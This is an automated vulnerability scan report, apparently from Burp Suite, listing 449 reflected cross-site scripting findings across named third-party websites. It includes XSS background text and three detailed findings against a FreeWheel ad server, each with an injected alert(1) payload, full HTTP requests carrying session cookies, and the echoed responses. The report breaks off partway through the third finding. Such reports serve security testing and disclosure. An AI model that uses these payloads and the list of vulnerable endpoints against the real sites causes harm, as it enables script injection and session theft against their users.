1.268. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 1]

1.269. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 2]

1.270. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 3]

1.271. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 1]

1.272. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 2]

1.273. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkerc5772a1335634287a05ff399d29aa45b [REST URL parameter 3]

1.274. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 1]

1.275. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 2]

1.276. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy [REST URL parameter 3]

1.277. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 1]

1.278. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 2]

1.279. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 3]

1.280. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 1]

1.281. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 2]

1.282. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 3]

1.283. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 4]

1.284. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 1]

1.285. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 2]

1.286. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 3]

1.287. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 4]

1.288. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 1]

1.289. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 2]

1.290. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 3]

1.291. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 4]

1.292. http://www.nrl.com/News/BillHarrigan/tabid/11005/Default.aspx [name of an arbitrarily supplied request parameter]

1.293. http://www.nrl.com/News/GrahamMurray/tabid/11006/Default.aspx [name of an arbitrarily supplied request parameter]

1.294. http://www.nrl.com/News/LeilaMcKinnon/tabid/11007/Default.aspx [name of an arbitrarily supplied request parameter]

1.295. http://www.nrl.com/News/LiveChat/tabid/11049/Default.aspx [name of an arbitrarily supplied request parameter]

1.296. http://www.nrl.com/News/MattRussell/tabid/11008/Default.aspx [name of an arbitrarily supplied request parameter]

1.297. http://www.nrl.com/News/Moments/tabid/11042/Default.aspx [name of an arbitrarily supplied request parameter]

1.298. http://www.nrl.com/News/PeterSterling/tabid/10993/Default.aspx [name of an arbitrarily supplied request parameter]

1.299. http://www.nrl.com/News/StatsInsider/tabid/11041/Default.aspx [name of an arbitrarily supplied request parameter]

1.300. http://www.nrl.com/News/TrentBarrett/tabid/11009/Default.aspx [name of an arbitrarily supplied request parameter]

1.301. http://www.nrl.com/News/WhereAreTheyNow/tabid/11044/Default.aspx [name of an arbitrarily supplied request parameter]

1.302. http://www.nrl.com/TelstraPremiership/2011Draw/tabid/10978/Default.aspx [name of an arbitrarily supplied request parameter]

1.303. http://www.nrl.com/TelstraPremiership/CasualtyWard/tabid/10247/Default.aspx [name of an arbitrarily supplied request parameter]

1.304. http://www.nrl.com/Video/2011GameAnalyser/tabid/10910/Default.aspx [name of an arbitrarily supplied request parameter]

1.305. http://www.nrl.com/telstrapremiership/gameanalyservideo/tabid/10910/default.aspx [name of an arbitrarily supplied request parameter]

1.306. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/228/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.307. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/692/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.308. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/14/playerid/752/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.309. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/15/playerid/210/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.310. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/336/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.311. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/338/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.312. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/145/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.313. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/32/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter]

1.314. http://www.premiermediagroup.com.au/opportunities/current-vacancies/ [REST URL parameter 1]

1.315. http://www.premiermediagroup.com.au/opportunities/current-vacancies/ [REST URL parameter 2]

1.316. http://www.proticket.com.au/event.asp [name of an arbitrarily supplied request parameter]

1.317. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [REST URL parameter 1]

1.318. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBbodystyle parameter]

1.319. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBbodystyle parameter]

1.320. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmake parameter]

1.321. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmake parameter]

1.322. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmodel parameter]

1.323. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmodel parameter]

1.324. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBprice parameter]

1.325. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SByear parameter]

1.326. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [name of an arbitrarily supplied request parameter]

1.327. http://www.realestateview.com.au/ [name of an arbitrarily supplied request parameter]

1.328. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 1]

1.329. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 2]

1.330. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [REST URL parameter 3]

1.331. http://www.realestateview.com.au/Real-Estate/Business/Buy.html [name of an arbitrarily supplied request parameter]

1.332. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 1]

1.333. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 2]

1.334. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [REST URL parameter 3]

1.335. http://www.realestateview.com.au/Real-Estate/Commercial/Buy.html [name of an arbitrarily supplied request parameter]

1.336. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 1]

1.337. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 2]

1.338. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [REST URL parameter 3]

1.339. http://www.realestateview.com.au/Real-Estate/Residential/Rent.html [name of an arbitrarily supplied request parameter]

1.340. http://www.realestateview.com.au/agents/ [REST URL parameter 1]

1.341. http://www.realestateview.com.au/holiday-rentals [name of an arbitrarily supplied request parameter]

1.342. http://www.realestateview.com.au/propertydata/ [REST URL parameter 1]

1.343. http://www.realestateview.com.au/propertydata/ [name of an arbitrarily supplied request parameter]

1.344. http://www.rkdms.com/redirect [name of an arbitrarily supplied request parameter]

1.345. http://www.scout.com/a.z [c parameter]

1.346. http://www.shutterstock.com/ [name of an arbitrarily supplied request parameter]

1.347. http://www.shutterstock.com/ [name of an arbitrarily supplied request parameter]

1.348. http://www.thefrisky.com/ [name of an arbitrarily supplied request parameter]

1.349. http://www.ticketexchangebyticketmaster.com/NFL/ [name of an arbitrarily supplied request parameter]

1.350. http://www.ticketexchangebyticketmaster.com/NFL/ [partnerCode parameter]

1.351. http://www.ticketexchangebyticketmaster.com/NFL/ [partnercode parameter]

1.352. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx [name of an arbitrarily supplied request parameter]

1.353. http://www.ticketexchangebyticketmaster.com/NFL/eventlist/eventslist.aspx [name of an arbitrarily supplied request parameter]

1.354. http://www.truelocal.com.au/cms/about-us [REST URL parameter 2]

1.355. http://www.truelocal.com.au/cms/about-us [REST URL parameter 2]

1.356. http://www.truelocal.com.au/cms/badges [REST URL parameter 2]

1.357. http://www.truelocal.com.au/cms/badges [REST URL parameter 2]

1.358. http://www.truelocal.com.au/cms/business-centre-products [REST URL parameter 2]

1.359. http://www.truelocal.com.au/cms/business-centre-products [REST URL parameter 2]

1.360. http://www.truelocal.com.au/cms/deals [REST URL parameter 2]

1.361. http://www.truelocal.com.au/cms/deals [REST URL parameter 2]

1.362. http://www.truelocal.com.au/cms/faq [REST URL parameter 2]

1.363. http://www.truelocal.com.au/cms/faq [REST URL parameter 2]

1.364. http://www.truelocal.com.au/cms/faq/ [REST URL parameter 2]

1.365. http://www.truelocal.com.au/cms/faq/ [REST URL parameter 2]

1.366. http://www.truelocal.com.au/cms/get-quotes [REST URL parameter 2]

1.367. http://www.truelocal.com.au/cms/get-quotes [REST URL parameter 2]

1.368. http://www.truelocal.com.au/cms/local-star-reviewer [REST URL parameter 2]

1.369. http://www.truelocal.com.au/cms/local-star-reviewer [REST URL parameter 2]

1.370. http://www.truelocal.com.au/cms/media-centre [REST URL parameter 2]

1.371. http://www.truelocal.com.au/cms/media-centre [REST URL parameter 2]

1.372. http://www.truelocal.com.au/cms/mobile [REST URL parameter 2]

1.373. http://www.truelocal.com.au/cms/mobile [REST URL parameter 2]

1.374. http://www.truelocal.com.au/cms/mobile/ [REST URL parameter 2]

1.375. http://www.truelocal.com.au/cms/mobile/ [REST URL parameter 2]

1.376. http://www.truelocal.com.au/cms/newsletter [REST URL parameter 2]

1.377. http://www.truelocal.com.au/cms/newsletter [REST URL parameter 2]

1.378. http://www.truelocal.com.au/cms/policies [REST URL parameter 2]

1.379. http://www.truelocal.com.au/cms/policies [REST URL parameter 2]

1.380. http://www.truelocal.com.au/cms/privacy-policy [REST URL parameter 2]

1.381. http://www.truelocal.com.au/cms/privacy-policy [REST URL parameter 2]

1.382. http://www.truelocal.com.au/cms/ratings-reviews [REST URL parameter 2]

1.383. http://www.truelocal.com.au/cms/ratings-reviews [REST URL parameter 2]

1.384. http://www.truelocal.com.au/cms/ratings-reviews/ [REST URL parameter 2]

1.385. http://www.truelocal.com.au/cms/ratings-reviews/ [REST URL parameter 2]

1.386. http://www.truelocal.com.au/cms/terms-conditions [REST URL parameter 2]

1.387. http://www.truelocal.com.au/cms/terms-conditions [REST URL parameter 2]

1.388. http://www.truelocal.com.au/map.do [search.location parameter]

1.389. http://www.truelocal.com.au/map.do [search.location parameter]

1.390. http://www.truelocal.com.au/map.do [search.location parameter]

1.391. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter]

1.392. http://xbox360.ign.com/ [name of an arbitrarily supplied request parameter]

1.393. http://xbox360.ign.com/articles/117/1179415p1.html [name of an arbitrarily supplied request parameter]

1.394. http://xbox360.ign.com/articles/117/1179415p1.html [name of an arbitrarily supplied request parameter]

1.395. http://xbox360.ign.com/articles/119/1193225p1.html [name of an arbitrarily supplied request parameter]

1.396. http://xbox360.ign.com/articles/119/1193225p1.html [name of an arbitrarily supplied request parameter]

1.397. http://xbox360.ign.com/articles/119/1197270p1.html [name of an arbitrarily supplied request parameter]

1.398. http://xbox360.ign.com/articles/119/1197270p1.html [name of an arbitrarily supplied request parameter]

1.399. http://xbox360.ign.com/articles/119/1197452p1.html [name of an arbitrarily supplied request parameter]

1.400. http://xbox360.ign.com/articles/119/1197452p1.html [name of an arbitrarily supplied request parameter]

1.401. http://xbox360.ign.com/articles/119/1197622p1.html [name of an arbitrarily supplied request parameter]

1.402. http://xbox360.ign.com/articles/119/1197622p1.html [name of an arbitrarily supplied request parameter]

1.403. http://xbox360.ign.com/articles/119/1197931p1.html [name of an arbitrarily supplied request parameter]

1.404. http://xbox360.ign.com/articles/119/1197931p1.html [name of an arbitrarily supplied request parameter]

1.405. http://xbox360.ign.com/articles/119/1197937p1.html [name of an arbitrarily supplied request parameter]

1.406. http://xbox360.ign.com/articles/119/1197937p1.html [name of an arbitrarily supplied request parameter]

1.407. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.408. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.409. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.410. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.411. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.412. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.413. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.414. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.415. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.416. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.417. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.418. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.419. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.420. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.421. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.422. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.423. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.424. http://xbox360.ign.com/index/top-reviewed.html [name of an arbitrarily supplied request parameter]

1.425. http://xbox360.ign.com/index/top-reviewed.html [name of an arbitrarily supplied request parameter]

1.426. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.427. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.428. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.429. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.430. http://xbox360.ign.com/objects/082/082318.html [name of an arbitrarily supplied request parameter]

1.431. http://xbox360.ign.com/objects/082/082318.html [name of an arbitrarily supplied request parameter]

1.432. http://xbox360.ign.com/objects/926/926417.html [name of an arbitrarily supplied request parameter]

1.433. http://xbox360.ign.com/objects/926/926417.html [name of an arbitrarily supplied request parameter]

1.434. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.435. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.436. http://xboxlive.ign.com/articles/119/1197949p1.html [name of an arbitrarily supplied request parameter]

1.437. http://xboxlive.ign.com/articles/119/1197949p1.html [name of an arbitrarily supplied request parameter]

1.438. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.439. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.440. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.441. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.442. http://searchportal.information.com/ [Referer HTTP header]

1.443. http://wrapper.askmen.com/a [Referer HTTP header]

1.444. http://wrapper.ign.com/a [Referer HTTP header]

1.445. http://www.shutterstock.com/ [Referer HTTP header]

1.446. http://www.taste.com.au/ [Referer HTTP header]

1.447. http://www.urbanspoon.com/ [Referer HTTP header]

1.448. http://www.urbanspoon.com/ [Referer HTTP header]

1.449. http://seg.sharethis.com/getSegment.php [__stid cookie]



1. Cross-site scripting (reflected)
There are 449 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the asid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 739f4"%3balert(1)//958107e54a8 was submitted in the asid parameter. This input was echoed as 739f4";alert(1)//958107e54a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1739f4"%3balert(1)//958107e54a8&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759045.753420735476538500.544603~664977~687378~,1317759038.438724.273825~,1317759023.649564.253944~254114~254701~254705~254706~327790~327796~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759045.28800.0.0,sg141659.1317753567.1317759045.28800.0.4,sg143516.1317753552.1317759045.28800.0.0,";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:10:45 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10447
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:10:44 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1739f4";alert(1)//958107e54a8", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the caid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b3a7"%3balert(1)//99c8bcfbc0b was submitted in the caid parameter. This input was echoed as 4b3a7";alert(1)//99c8bcfbc0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=4b3a7"%3balert(1)//99c8bcfbc0b&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759053.0,20487.1317759053.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759069.438724.273825~,1317759029.649564a2e5761a53c8824f4df602c.253944~,1317759028.a2e5761a1295382b71812f2c.253944~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759069.28800.0.0,sg141659.1317753567.1317759069.28800.0.4,sg143516.1317753552.1317759069.28800.0.0,";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:11:09 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10173
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:08 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{customId:"4b3a7";alert(1)//99c8bcfbc0b", id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"a
...[SNIP]...

1.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the csid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 441f3"%3balert(1)//f9173373918 was submitted in the csid parameter. This input was echoed as 441f3";alert(1)//f9173373918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

